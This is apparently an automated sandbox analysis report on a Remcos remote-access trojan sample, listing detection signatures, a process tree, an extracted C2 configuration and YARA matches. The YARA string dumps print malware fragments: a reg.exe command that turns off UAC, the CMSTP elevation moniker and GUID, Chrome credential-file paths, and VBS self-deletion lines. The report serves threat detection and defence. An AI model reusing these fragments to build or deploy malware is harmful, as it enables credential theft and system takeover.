Edit tour

Windows Analysis Report
bwYw3UUfy7.exe

Overview

General Information

Sample name:	bwYw3UUfy7.exe renamed because original name is a hash value
Original sample name:	0d9239013e7f6fab8aab618ce46b5225d0283da9f81d937cae7a3988a127f879.exe
Analysis ID:	1587911
MD5:	b596edf7ebfb3a944a94685a207677bd
SHA1:	e6776df73c784fec5de9c79bce860081d2915ed2
SHA256:	0d9239013e7f6fab8aab618ce46b5225d0283da9f81d937cae7a3988a127f879
Tags:	exeuser-adrian__luca
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

bwYw3UUfy7.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\bwYw3UUfy7.exe" MD5: B596EDF7EBFB3A944A94685A207677BD)

Graff.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\bwYw3UUfy7.exe" MD5: B596EDF7EBFB3A944A94685A207677BD)

Graff.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\molcoacbwimigbrwpmuqe" MD5: B596EDF7EBFB3A944A94685A207677BD)

Graff.exe (PID: 7932 cmdline: C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne" MD5: B596EDF7EBFB3A944A94685A207677BD)

Graff.exe (PID: 7948 cmdline: C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne" MD5: B596EDF7EBFB3A944A94685A207677BD)

Graff.exe (PID: 7960 cmdline: C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\zlegpdywxzwztnceqhblsxavxvk" MD5: B596EDF7EBFB3A944A94685A207677BD)

wscript.exe (PID: 8160 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Graff.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Local\misruling\Graff.exe" MD5: B596EDF7EBFB3A944A94685A207677BD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.1512004348.0000000001800000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.1512067851.00000000018D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.3742200171.000000000406E000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
00000002.00000002.3740170778.0000000001401000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.3741371682.000000000149E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Graff.exe PID: 7792	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: Graff.exe PID: 7792	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Graff.exe PID: 7792	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Graff.exe PID: 7792	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Graff.exe PID: 7792	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xd4f3c3:$a1: Remcos restarted by watchdog! 0xd86e9f:$a1: Remcos restarted by watchdog! 0xd4f920:$a3: %02i:%02i:%02i:%03i 0xd4fcd8:$a3: %02i:%02i:%02i:%03i 0xd873fc:$a3: %02i:%02i:%02i:%03i 0xd877b4:$a3: %02i:%02i:%02i:%03i
Process Memory Space: Graff.exe PID: 7924	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: Graff.exe PID: 1436	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Graff.exe PID: 1436	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Graff.exe PID: 1436	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Graff.exe PID: 1436	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xaf2f8f:$a1: Remcos restarted by watchdog! 0xd04295:$a1: Remcos restarted by watchdog! 0xaf34ec:$a3: %02i:%02i:%02i:%03i 0xaf38a4:$a3: %02i:%02i:%02i:%03i 0xd047f2:$a3: %02i:%02i:%02i:%03i 0xd04baa:$a3: %02i:%02i:%02i:%03i
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.Graff.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.Graff.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.Graff.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Graff.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
10.2.Graff.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
10.2.Graff.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
10.2.Graff.exe.4010000.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.Graff.exe.4010000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.Graff.exe.4010000.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Graff.exe.4010000.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
10.2.Graff.exe.4010000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
10.2.Graff.exe.4010000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
2.2.Graff.exe.3bf0000.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
2.2.Graff.exe.3bf0000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
2.2.Graff.exe.3bf0000.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.Graff.exe.3bf0000.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
2.2.Graff.exe.3bf0000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
2.2.Graff.exe.3bf0000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
2.2.Graff.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
2.2.Graff.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
2.2.Graff.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.Graff.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
2.2.Graff.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
